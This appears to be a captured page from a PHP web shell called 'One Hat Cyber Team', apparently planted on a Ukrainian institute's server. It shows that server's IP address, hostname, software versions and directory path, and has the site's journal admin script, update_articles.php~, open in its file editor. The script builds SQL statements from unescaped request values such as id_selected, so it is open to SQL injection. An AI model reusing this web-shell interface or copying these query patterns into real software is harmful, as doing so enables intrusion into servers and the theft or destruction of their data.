One Hat Cyber Team
Your IP :
216.73.216.24
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html
/
admin
/
Edit File:
update_articles.php~
<? $page_title="Manage articles table: action performed"; echo "<HTML><BODY>"; require("../login/include/session.php"); //require_once("header.php"); include("../auth/auth.php"); include("functions_admin.php"); $lang = languify($_POST['lang']); $_updcols = fields_to_update("article"); mysql_query("SET NAMES ".$_charset); $todo_selected = take_variable("todo_selected"); $id_selected = take_variable("id_selected"); $title_en=addtexslashes(take_variable("title_en","POST")); $title_ru=addtexslashes(take_variable("title_ru","POST")); $title_ua=addtexslashes(take_variable("title_ua","POST")); $notes=trim(take_variable($notes,"POST")); switch ($todo_selected) { case "insert": fill_var_enruua("title","trim"); $names=$values=""; $i=0; foreach ($_updcols as $val) { if ($val) { if($i) { $values=$values.","; $names=$names.","; } $names=$names.$val; //$values=$values."'".quotemeta(take_variable($val,"POST"))."'"; $values=$values."'".addtexslashes(htmlspecialchars(take_variable($val,"POST"),ENT_QUOTES)) ."'"; } $i++; } $q = "insert into Articles (".$names.",created,created_by,updated_by) values (".$values.",now(),".$session->author_id.",".$session->author_id.")"; $res=mysql_query($q); if ($id=mysql_insert_id()) { mysql_query("insert into Revisions (article_id,revision_received,created,created_by,updated_by) values ('".$id."', now(), now(),'".$session->author_id."','".$session->author_id."') "); tell(enruua("By your request, I have created in the articles table a new card with number", "По Вашему запросу в таблице статей создана новая карточка с номером", "За Вашим бажанням в таблиці статей створенo нову картку з номером")." ".$id ."".enruua("","","").". " .enruua("You will now be redirected to that card's modification page", "Сейчас будет открыта страница редактирования этой карточки", "Зараз буде відкрито сторінку редагування цієї картки")); go("manage_articles_action.php",array("id_selected","todo"),array($id,"modify")); } else { tell(enruua("Errors have happened when inserting a new record", "При создании новой карточки в таблице статей возникли ошибки", "При створенні нової картки в таблиці статей виникли помилки")."!"); go("index.php"); } break; case "update": fill_var_enruua("title","trim"); $command=""; foreach ($_updcols as $val) { if(isset(${$val})) { if ($command) { $command=$command.","; } //${$val}=mysql_real_escape_string(${$val}); ${$val}=addtexslashes(htmlspecialchars(take_variable($val,"POST"),ENT_QUOTES)); $command=$command."$val='${$val}'"; } } //reset($_updcols); //echo "<p>($command)"; $res = mysql_db_query($_db, "UPDATE Articles SET ".$command." WHERE id='".$id_selected."'"); //first remove the related data from AA /* $res = mysql_db_query($_db, "DELETE FROM AA WHERE article_id='$id_selected'"); */ //22.01.2007 /* now look what needs to be inserted (if any)... this code seems to be unnecessary (unless somebody else tries to modify the database right at the moment */ $res = mysql_db_query($_db, "SELECT id, author_id, article_id,author_ambition FROM AA_temp WHERE article_id='$id_selected'"); while ($aa_temp = mysql_fetch_array($res) ) { $res_prev_from_aa = mysql_db_query($_db,"SELECT id,author_id,article_id, author_ambition FROM AA WHERE article_id='$id_selected'"); $should_insert_something = 1; //check whether there is something on article no. $id_selected in AA while ($prev_from_aa = mysql_fetch_array($res_prev_from_aa)) { //while if (!$should_insert_something) break; if ( ($prev_from_aa['author_id']==$aa_temp['author_id']) && ($prev_from_aa['article_id']==$aa_temp['article_id']) ) { mysql_db_query($_db,"UPDATE AA set author_ambition='$aa_temp[author_ambition]' WHERE id='$prev_from_aa[id]' "); $should_insert_something=0; } // do nothing if no similar entries found } //while // if ($should_insert_something) { //echo "adding a new info on Article no. '$id_selected'<br> "; $res_aa = mysql_db_query($_db, "REPLACE INTO AA (author_id,article_id, author_ambition) VALUES ('$aa_temp[author_id]', '$aa_temp[article_id]', '$aa_temp[author_ambition]') "); } } // from AA_temp // //now flush from AA_temp what concerns Art. $id_selected: $q=mysql_db_query($_db,"DELETE FROM AA_temp WHERE article_id='$id_selected' "); // //if (mysql_affected_rows()) if ($res) { mysql_query("update Articles set updated=now(),updated_by='".$session->author_id."' where id='$id_selected' "); tell(enruua("The record corresponding to Article","Карточка статьи","Картка статті") ."" ." ".$id_selected. " ". enruua("have been successfully updated","успешно обновлена","успішно оновлено")."."); } else { tell(enruua("The record corresponding to Article","Карточку статьи","Картка статті") ."" ." ".$id_selected. " ". enruua("could not be updated","обновить не удалось","оновити не вдалося")."!"); } go("manage_articles_action.php",array("id_selected","todo"),array($id_selected,"modify")); break; case "erase": $resrev = mysql_query("select id from Revisions where article_id='".$id_selected."'"); while ($r = mysql_fetch_array($resrev)) { delete_revision($r['id'],TRUE); } mysql_query("delete from Articles where id='".$id_selected."'"); $resa = mysql_query("delete from AA where article_id='".$id_selected."'"); if ($resa) { tell(enruua("The record corresponding to Article","Карточка статьи","Картка статті") ."" ." ".$id_selected. " ". enruua("have been successfully deleted","успешно удалена","успішно видалено")."."); } else { tell(enruua("Errors have happened when deleting the record for Article", "При удалении карточки статьи", "При видаленні картки статті") ." ".$id_selected. " ". enruua("","возникли ошибки","виникли помилки")."!"); } go("index.php"); break; case "cancel": default: go("index.php"); break; } //require("footer.php"); ?>
Simpan